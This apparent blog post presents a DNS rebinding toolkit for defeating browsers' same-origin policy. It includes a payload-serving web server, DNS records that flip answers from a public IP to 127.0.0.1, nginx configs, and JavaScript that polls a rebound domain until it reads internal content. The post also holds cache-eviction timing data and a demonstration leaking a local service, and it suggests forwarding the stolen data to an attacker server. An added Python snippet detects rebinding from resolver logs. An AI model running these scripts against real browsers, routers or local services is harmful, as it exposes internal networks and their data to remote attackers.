DNS Rebinding Tool – DNS Rebind Tool With Custom Scripts

October 6, 2019

This project is meant to be an all-in-one toolkit for testing DNS rebinding attacks further, and documents my take on understanding this kind of attack. It consists of a web server and a pseudo DNS server that only responds to A queries.

The root index of the web server allows configuring and running the attack through a rudimentary web GUI. See dnsrebindtool.43z.one.

A basic nginx config to host the web server:

server {
  listen 80;
  server_name dnsrebindtool.43z.one;

  location / {
    proxy_pass http://localhost:5000;
  }
}

The /attack route of the web server reads the GET parameter script, which should contain base64-encoded JavaScript, and responds with the decoded code (wrapped in a setTimeout) embedded in a regular HTML page.

% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" 
<html>
    <script>

    setTimeout(function(){
      alert(1) 
    }, 3000)

  </script>
</html>

Within my registrar for the domain 43z.one I set up an NS record for the subdomain rebind pointing to the IP where this tool is hosted.

ns       A   81.4.124.10
rebind   NS  ns.43z.one

The DNS server responds only to A queries in this format:

evcmxfm4g . 81-4-124-10 . 127-0-0-1 .rebind.43z.one

The first part (subdomain) is just a random id and should be generated for every attack session (the web GUI does this on every reload). Second comes the IP the DNS server should respond with for the next 2 seconds, and third the IP the server should respond with after that time has passed.

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 
Fri Feb  2 21:18:20 CET 2018
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 81.4.124.10

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Fri Feb  2 21:18:23 CET 2018
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 127.0.0.1
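A defender-side check for the flip shown in those two nslookup runs, as an added example that is not part of the tool or the original post. It scans constructed resolver observations in an assumed "timestamp name answer" form (not a real log format) and flags both a name whose answer changes from a public to an internal address within a short window and a name that encodes an internal IP in its labels the way this tool's naming scheme does.

```python
import ipaddress
from datetime import datetime, timedelta
import re

# Constructed sample in "timestamp name answer" form, modelled on the nslookup
# runs above; not real captured traffic.
SAMPLE_LOG = """\
2018-02-02T21:18:20 evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 81.4.124.10
2018-02-02T21:18:23 evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 127.0.0.1
2018-02-02T21:18:25 www.example.com 93.184.216.34
"""

DASHED_IPV4 = re.compile(r"^\d{1,3}-\d{1,3}-\d{1,3}-\d{1,3}$")

def is_internal(addr):
    """Loopback, RFC1918 or link-local: targets a browser should never be rebound to."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_private or ip.is_link_local

def decode_rebind_name(name):
    """Recognise the tool's <id>.<ip1>.<ip2>.<zone> layout; returns (ip1, ip2) or None."""
    labels = name.lower().split(".")
    if len(labels) < 4 or not all(DASHED_IPV4.match(lab) for lab in labels[1:3]):
        return None
    try:
        return tuple(str(ipaddress.ip_address(lab.replace("-", "."))) for lab in labels[1:3])
    except ValueError:  # e.g. an octet above 255
        return None

def detect_rebinding(log_text, window=timedelta(seconds=60)):
    """Two signals: (1) a name whose answer flips from public to internal within
    `window`, as in the nslookup runs above; (2) a name that encodes an internal IP."""
    last_public, flagged, findings = {}, set(), []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        ts, name, answer = datetime.fromisoformat(parts[0]), parts[1].lower(), parts[2]
        encoded = decode_rebind_name(name)
        if encoded and is_internal(encoded[1]) and name not in flagged:
            flagged.add(name)
            findings.append(("encoded-internal-ip", name, encoded[1]))
        if is_internal(answer):
            prev = last_public.get(name)
            if prev and ts - prev[0] <= window:
                findings.append(("public-to-internal-flip", name, f"{prev[1]}->{answer}"))
        else:
            last_public[name] = (ts, answer)
    return findings
```

The same flip check works on any resolver log once the three fields are extracted, and the label decoder only matters for this tool's naming scheme.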

The last missing piece is an nginx config for the rebind domains. Only the /attack route should be passed to the tool; all other routes should respond with an error. This allows attacking other services on port 80 on every route except /attack (like /api/monitoring/stats, an endpoint my router exposes).

server {
  listen 80;
  server_name *.rebind.43z.one;

  location / {
    return 404;
  }

  location /attack {
    proxy_pass http://localhost:5000/attack;
  }
}

DNS Cache Eviction

var xhr = new XMLHttpRequest()
xhr.open('GET', '//czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// first time the browser sees this domain it queries the DNS server
// and gets 81.4.124.10

// sleep for more than 2 sec

xhr.open('GET', '//czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// still uses 81.4.124.10 (AND NOT 127.0.0.1)
// NO DNS query happened, the browser used the cached IP

This is a problem for this kind of attack: in order to work, the browser has to issue a new DNS query to get the second IP. In theory, if you just wait long enough between the requests, a new query should happen. My tests show, though, that there is a faster but more aggressive approach. It may well be setup specific and needs more testing. I used the following script to measure the optimum value for the WAIT variable. Tested on Chromium 62.0.3202.89 running on Debian buster/sid.

var WAIT = 200
var start = Date.now()

var interval = setInterval(function(){
  var xhr = new XMLHttpRequest()
  xhr.open('GET', '//' + $REBIND_DOMAIN, false)

  xhr.send()

  if(xhr.status == 200){
    document.body.innerHTML = (Date.now() - start)/1000
    document.body.innerHTML += xhr.responseText
    clearInterval(interval)
    return
  }
}, WAIT)

WAIT (ms)   requests Chrome sends   time until Chrome queries DNS again (s)
0           700                     60
10          700                     60
100         600                     63
120         500                     63
150         400                     63
180         400                     75
200         300                     63
220         300                     69
250         300                     78
280         300                     87
300         200                     63
320         200                     67
340         200                     71
360         200                     75
380         200                     79
400         200                     83
1000        100                     103

I started a new repo just to explore this: the DNS cache eviction tester.

Putting it all together and testing it:

echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1

This netcat instance serves some content I would like to get access to. I keep the default rebind domain $RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one and the default script

var start = Date.now()

var interval = setInterval(function(){
  var xhr = new XMLHttpRequest()
  xhr.open('GET', '//' + $REBIND_DOMAIN, false)

  xhr.send()

  if(xhr.status == 200){
    document.body.innerHTML = (Date.now() - start)/1000
    document.body.innerHTML += xhr.responseText
    clearInterval(interval)
    return
  }
}, 200)

on dnsrebindtool.43z.one and hit the Attack button. Open the dev tools network tab to see what is happening in the background. For me, after about 60 seconds the iframe fills up with the string TOPSECRET and the time it took: DNS rebinding circumvented the SOP. To get the breached data out of the iframe one could use window.postMessage() or include code in the script itself that forwards the data to another attacker server.

Download DNS Rebinding Tool
